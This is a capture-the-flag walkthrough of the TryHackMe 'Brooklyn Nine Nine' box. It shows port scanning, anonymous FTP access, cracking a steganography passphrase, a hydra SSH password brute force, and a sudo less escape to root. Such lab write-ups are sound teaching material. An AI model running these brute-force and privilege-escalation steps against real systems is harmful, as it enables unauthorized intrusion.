4 minutes
THM: Brooklyn Nine Nine
Title:Brooklyn Nine Nine
Description:This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.127.175 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 22:50 GMT
Nmap scan report for 10.10.127.175
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.18.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds
FTP
Lets start with the FTP port. Based on the nmap we can get on anonymously
# ftp -A 10.10.127.175
Connected to 10.10.127.175.
220 (vsFTPd 3.0.3)
Name (10.10.127.175:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 114 4096 May 17 2020 .
drwxr-xr-x 2 0 114 4096 May 17 2020 ..
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |************************************************************| 119 39.52 KiB/s 00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (4.77 KiB/s)
note_to_jake.txt:
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
Website
The website seems fairly basic
However checking the source gives a hidden message
Saving the image from the site we use stegseek to find the hidden message and crack the password
# stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "*****"
[i] Original filename: "note.txt".
[i] Extracting to "brooklyn99.jpg.out".
This gives us another potential user and password
# cat brooklyn99.jpg.out
Holts Password:
f******************e
Enjoy!!
Using those details we can login and get the user flag
# ssh holt@10.10.127.175
The authenticity of host '10.10.127.175 (10.10.127.175)' can't be established.
ED25519 key fingerprint is SHA256:ceqkN71gGrXeq+J5/dquPWgcPWwTmP2mBdFS2ODPZZU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.127.175' (ED25519) to the list of known hosts.
holt@10.10.127.175's password:
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18
holt@brookly_nine_nine:~$ ls
nano.save user.txt
holt@brookly_nine_nine:~$ cat user.txt
e******************************e
Privilege escalation
Checking for the sudo privs we see we can run sudo
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano
And checking on GTFOBins we can exploit this
Alternative method
The room description indicates there is a second method. For this one will will use the information gathered via FTP to brute force SSH for the jake user
# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.127.175 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-22 23:13:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.127.175:22/
[22][ssh] host: 10.10.127.175 login: jake password: *********
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-22 23:13:21
Using theses details we login as jake and the user flag in holt’s account is readable to all users
# ssh jake@10.10.127.175
jake@10.10.127.175's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ ls -l /home/holt/user.txt
-rw-rw-r-- 1 holt holt 33 May 17 2020 /home/holt/user.txt
For the privilege escalation we check the sudo permissions and see we can run less. Again using GTFOBins we can escape from this to root
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
jake@brookly_nine_nine:~$ sudo less /etc/profile
# id
uid=0(root) gid=0(root) groups=0(root)